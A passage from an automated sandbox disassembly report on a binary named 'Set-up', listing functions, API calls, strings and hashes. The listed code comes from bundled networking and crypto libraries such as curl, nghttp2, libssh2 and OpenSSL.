_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!(stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES),nghttp2_session.c,0000052F,?,?,-00000264,?,00000000,?,00000004,?), ref: 00E4A952
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES) || nghttp2_stream_in_dep_tree(stream),nghttp2_session.c,0000052A,?,?,-00000264,?,00000000,?,00000004,?), ref: 00E4A967
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(dep_stream,nghttp2_session.c,000005B2), ref: 00E4A97C

Strings

dep_stream, xrefs: 00E4A977
stream->state == NGHTTP2_STREAM_IDLE, xrefs: 00E4A938
nghttp2_session.c, xrefs: 00E4A933, 00E4A948, 00E4A95D, 00E4A972
(stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES) || nghttp2_stream_in_dep_tree(stream), xrefs: 00E4A962
!(stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES), xrefs: 00E4A94D

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: !(stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES)$(stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES) || nghttp2_stream_in_dep_tree(stream)$dep_stream$nghttp2_session.c$stream->state == NGHTTP2_STREAM_IDLE
API String ID: 1222420520-184303863
Opcode ID: 865e75bfaf20e1e0dfbf725fd09b3ec98263f95521b64e0940152bb43e8e2117
Instruction ID: a5701643621339be8db91418664e9af6188013f17ff19a48dd712aa10c86b460
Opcode Fuzzy Hash: 865e75bfaf20e1e0dfbf725fd09b3ec98263f95521b64e0940152bb43e8e2117
Instruction Fuzzy Hash: D3E158719843849BEB308E24AC05BEB7BE5AF4432DF0C643DEC49A6282E735D944DB53

Function 00E0E270 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 303stringCOMMON

Download Yara Rule

APIs

strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F,?,?,?,?,?,00000000,?,?,?,?,?,?,00E0CC57), ref: 00E0F028

Strings

TYPE %c, xrefs: 00E0E323
STOR_PREQUOTE, xrefs: 00E0F1F7
%s%s%s, xrefs: 00E0F07B
[%s] -> [%s], xrefs: 00E0E2E0, 00E0E38E, 00E0F116, 00E0F203
LIST, xrefs: 00E0F059, 00E0F10A
NLST, xrefs: 00E0F05E, 00E0F07A
ftp.c, xrefs: 00E0F08A, 00E0F0BD, 00E0F13C
SIZE %s, xrefs: 00E0E406

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strrchr
String ID: %s%s%s$LIST$NLST$SIZE %s$STOR_PREQUOTE$TYPE %c$[%s] -> [%s]$ftp.c
API String ID: 3418686817-2910492138
Opcode ID: b5bf8f17a88cb9a3f2689740640f5d06d2c97f92d64ba57aa9ab50ffc06eb21f
Instruction ID: 07dea4a0e96e0e32c94048f3f8d7df21cbe4f12932ef425fa10414c9f04f85f6
Opcode Fuzzy Hash: b5bf8f17a88cb9a3f2689740640f5d06d2c97f92d64ba57aa9ab50ffc06eb21f
Instruction Fuzzy Hash: BFA145717043009BE72886249885BB77BA9EB9130CF08447DFA49AB6C3E376DD95C790

Function 00EAE420 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,00DF1887,?,?,00000000,?,00000000,00000007), ref: 00EAE43D

Strings

Unable to allocate memory for FXP_RENAME packet, xrefs: 00EAE66A
File already exists and SSH_FXP_RENAME_OVERWRITE not specified, xrefs: 00EAE673
Operation Not Supported, xrefs: 00EAE67A
Server does not support RENAME, xrefs: 00EAE4B9
Unable to send FXP_RENAME command, xrefs: 00EAE661
SFTP rename packet too short, xrefs: 00EAE5F9
SFTP Protocol Error, xrefs: 00EAE63E
Error waiting for FXP STATUS, xrefs: 00EAE64F

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _time64
String ID: Error waiting for FXP STATUS$File already exists and SSH_FXP_RENAME_OVERWRITE not specified$Operation Not Supported$SFTP Protocol Error$SFTP rename packet too short$Server does not support RENAME$Unable to allocate memory for FXP_RENAME packet$Unable to send FXP_RENAME command
API String ID: 1670930206-3556387644
Opcode ID: 1a682e34b614ef7a2402d05baab2d8339d665128cfff24a404d843ceec9d6d0d
Instruction ID: d8c34f65d64316e67825b777d31bc615f8058fd5e5fc67ce213f878403b57786
Opcode Fuzzy Hash: 1a682e34b614ef7a2402d05baab2d8339d665128cfff24a404d843ceec9d6d0d
Instruction Fuzzy Hash: 8C71B2B1504300AFD7209F24DC45B6B7BE4AF9A318F045D1DF99AAB392E771B804CB92

Function 00E6A8E0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 122COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 00E6A9E8
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < blk->n,nghttp3_ksl.c,000002C3,?,?,?,?,?,00E671B7,00000001,?,?), ref: 00E6AA04
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key),nghttp3_ksl.c,000002C7,?,00E671B7,00000001,?,?), ref: 00E6AA19
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,000002BE,?,?,?,?,?,00E671B7,00000001,?,?), ref: 00E6AA2E

Strings

nghttp3_ksl.c, xrefs: 00E6A9FA, 00E6AA0F, 00E6AA24
key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key), xrefs: 00E6AA14
ksl->head, xrefs: 00E6AA29
i < blk->n, xrefs: 00E6A9FF

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert$memcpy
String ID: i < blk->n$key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key)$ksl->head$nghttp3_ksl.c
API String ID: 3718630003-2514804127
Opcode ID: 1bd718a1b3b01ed90e7bef287d10a1eb656750f6ab75ee0f9817a41f0d2c10b3
Instruction ID: 41149b666df556c8d8ec150cb38267300c1b8938e7a84ae72c78c6e7eb05a3f6
Opcode Fuzzy Hash: 1bd718a1b3b01ed90e7bef287d10a1eb656750f6ab75ee0f9817a41f0d2c10b3
Instruction Fuzzy Hash: 0641CA719442049FDB00CF15EC84F5A7BA5FF9838CF1A54ACE889AB262E331D855CF52

Function 01002370 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 86encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 0100238F
CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 010023C4
GetLastError.KERNEL32 ref: 01002433

Part of subcall function 01002240: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,00FFF763,?,?,?,?,?), ref: 01002251
Part of subcall function 01002240: WideCharToMultiByte.KERNEL32 ref: 01002284
Part of subcall function 01002240: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 010022BD

Strings

%lX, xrefs: 0100243E
Error code= 0x, xrefs: 0100244F
engines/e_capi.c, xrefs: 010023A4, 01002426, 01002466
capi_cert_get_fname, xrefs: 01002379
engines/e_capi_err.c, xrefs: 01002400
ERR_CAPI_error, xrefs: 010023F9

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: ByteCertCertificateCharContextMultiPropertyWide$ErrorLastwcslen
String ID: %lX$ERR_CAPI_error$Error code= 0x$capi_cert_get_fname$engines/e_capi.c$engines/e_capi_err.c
API String ID: 3049598375-4146664032
Opcode ID: 409ab6ba44ad97edfcd48b1735fe147b13016d4a2978775e00b18537aad87611
Instruction ID: 7fcbff8ce8abe775b0718bed047ebd0e76db7aaa6264633b57f85241f888b09a
Opcode Fuzzy Hash: 409ab6ba44ad97edfcd48b1735fe147b13016d4a2978775e00b18537aad87611
Instruction Fuzzy Hash: 6F21DD71B407007BF62136A5BC57F3F3A588B85B05F11803AFA4CB52D7E6AD45245663

Function 00DF0762 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 377stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00DF0794

Part of subcall function 00EAF340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,00DF00B0,?,?,00000000,00000000,?), ref: 00EAF35D

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00DF356E

Strings

Upload failed: %s (%lu/%d), xrefs: 00DF4719
Failed to read data, xrefs: 00DF4CD7
Unknown error in libssh2, xrefs: 00DF386C, 00DF3874
Could not seek stream, xrefs: 00DF4D26
ssh error, xrefs: 00DF470D, 00DF4718
Creating the dir/file failed: %s, xrefs: 00DF3875
Bad file size (%lld), xrefs: 00DF4D42

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlen$_time64
String ID: Bad file size (%lld)$Could not seek stream$Creating the dir/file failed: %s$Failed to read data$Unknown error in libssh2$Upload failed: %s (%lu/%d)$ssh error
API String ID: 2413861649-3110757985
Opcode ID: af259ff2139f64b3f959204b62a92556c8c07d0d1e833c61290751e9678d59cc
Instruction ID: 9b31e6a731112c475ff7bb03284f7ec8da627ad585d5abb304d8c7352ba8c2a0
Opcode Fuzzy Hash: af259ff2139f64b3f959204b62a92556c8c07d0d1e833c61290751e9678d59cc
Instruction Fuzzy Hash: 58E1B1B1A047059BD714DF28C881B6AB7E5FB88304F168638FA599B351DB31AE04CBA1

Function 00E248F0 Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 349COMMON

Download Yara Rule

APIs

memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00E2491A
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00E2497C
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00E249F1
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00E24ABB
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00E24B21
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00E24BCF
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00E24C33
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00E24CDD
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,?,0000000B), ref: 00E24D30

Strings

0123456789, xrefs: 00E2490D, 00E24915, 00E24977, 00E249A2, 00E249EC, 00E24A0D, 00E24AB6, 00E24AE1, 00E24B1C, 00E24B3D, 00E24BCA, 00E24BF3, 00E24C2E, 00E24C4F, 00E24CD8, 00E24CF8, 00E24D20, 00E24D2B

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memchr
String ID: 0123456789
API String ID: 3297308162-2793719750
Opcode ID: c8999bdd138e96efb07d5d5b3d7d6c7984ee842700db67452288d5a6b8649939
Instruction ID: b8f5a6fc269d874295c69f52f51b43a45145fc5a9505e2f83426263fc28ddd3d
Opcode Fuzzy Hash: c8999bdd138e96efb07d5d5b3d7d6c7984ee842700db67452288d5a6b8649939
Instruction Fuzzy Hash: E9B147E16483B25BDB259A29A4A07BA7FC48F92748F1C406DDDC59B3C3E726CD49C311

Function 00E0C5E0 Relevance: 15.3, APIs: 1, Strings: 9, Instructions: 269stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(-00000004), ref: 00E0C625

Strings

%04d%02d%02d %02d:%02d:%02d GMT, xrefs: 00E0C8BB
Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT, xrefs: 00E0C6CA
Skipping time comparison, xrefs: 00E0C7D5
STOP, xrefs: 00E0C9C3
unsupported MDTM reply format, xrefs: 00E0C72D
The requested document is not old enough, xrefs: 00E0C7AA
The requested document is not new enough, xrefs: 00E0C971
[%s] -> [%s], xrefs: 00E0C9CF
MDTM failed: file does not exist or permission problem, continuing, xrefs: 00E0C70D

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlen
String ID: %04d%02d%02d %02d:%02d:%02d GMT$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT$MDTM failed: file does not exist or permission problem, continuing$STOP$Skipping time comparison$The requested document is not new enough$The requested document is not old enough$[%s] -> [%s]$unsupported MDTM reply format
API String ID: 39653677-399221622
Opcode ID: e47079413cd9334f9ce00c74161ea229e8b406132973c192d9d4553d699932c8
Instruction ID: b5871f1965e916ccc72988971a97eb2e05a75f9ede790aa8a913e5e73165c6c4
Opcode Fuzzy Hash: e47079413cd9334f9ce00c74161ea229e8b406132973c192d9d4553d699932c8
Instruction Fuzzy Hash: 0EB146701047459BC734CF34C884BAABBE5AF4130CF28562EE899A72D2E735F695CB91

Function 00F2A1B0 Relevance: 15.2, APIs: 3, Strings: 7, Instructions: 174stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F9B4B0: GetEnvironmentVariableW.KERNEL32(OPENSSL_WIN32_UTF8,00000000,00000000,?,?,00000000,00000000,00000000,?,00FA7667,OPENSSL_MODULES), ref: 00F9B4CA
Part of subcall function 00F9B4B0: GetACP.KERNEL32(?,?,00000000,00000000,00000000,?,00FA7667,OPENSSL_MODULES), ref: 00F9B4D4
Part of subcall function 00F9B4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,00FA7667,000000FF,00000000,00000000,?,?,00000000,00000000,00000000,?,00FA7667,OPENSSL_MODULES), ref: 00F9B53B
Part of subcall function 00F9B4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,00FA7667,000000FF,-00000008,00000000,?,?,?,00000000,00000000,00000000,?,00FA7667,OPENSSL_MODULES), ref: 00F9B5A1
Part of subcall function 00F9B4B0: GetEnvironmentVariableW.KERNEL32(-00000008,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00FA7667,OPENSSL_MODULES), ref: 00F9B5B4
Part of subcall function 00F9B4B0: GetEnvironmentVariableW.KERNEL32(?,-00000008,00000000,?,?,?,?,00000000,00000000,00000000,?,00FA7667,OPENSSL_MODULES), ref: 00F9B648
Part of subcall function 00F9B4B0: WideCharToMultiByte.KERNEL32 ref: 00F9B67F

Part of subcall function 00F9B4B0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(00FA7667,?,?,00000000,00000000,00000000,?,00FA7667,OPENSSL_MODULES), ref: 00F9B504

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00F2A1F0
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00F2A20B
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000000,00000000), ref: 00F2A25D

Strings

QLOGDIR, xrefs: 00F2A1BB
client, xrefs: 00F2A2E2
%02x, xrefs: 00F2A29F
server, xrefs: 00F2A2E7, 00F2A2EF
_%s.sqlog, xrefs: 00F2A2F0
ssl/quic/qlog.c, xrefs: 00F2A23E, 00F2A375, 00F2A38C
OSSL_QFILTER, xrefs: 00F2A1CA

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: ByteCharEnvironmentMultiVariableWide$strlen$getenvmemcpy
String ID: %02x$OSSL_QFILTER$QLOGDIR$_%s.sqlog$client$server$ssl/quic/qlog.c
API String ID: 2744062652-2540125403
Opcode ID: 2ce5733f9201aba9ea03986b65a43a193ea28cf16cc7aa12e3b40aba46155adb
Instruction ID: 5847aa10f0393a1915be39f30de62125f28c24ee47f6bd6b48d216380b9acc2f
Opcode Fuzzy Hash: 2ce5733f9201aba9ea03986b65a43a193ea28cf16cc7aa12e3b40aba46155adb
Instruction Fuzzy Hash: CA512BA1E043646FE711AA657C42B2B76D89F90714F08043DFD8987283F77AEC54A7A3

Function 00DE27E0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 299stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00DE284C

Strings

Alt-svc connecting from [%s]%s:%d to [%s]%s:%d, xrefs: 00DE2DA3
url.c, xrefs: 00DE2863, 00DE28B0, 00DE2CF9, 00DE2DDE
Please URL encode %% as %%25, see RFC 6874., xrefs: 00DE29E3
%s%s%s, xrefs: 00DE2834
No valid port number in connect to host string (%s), xrefs: 00DE2C4B

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
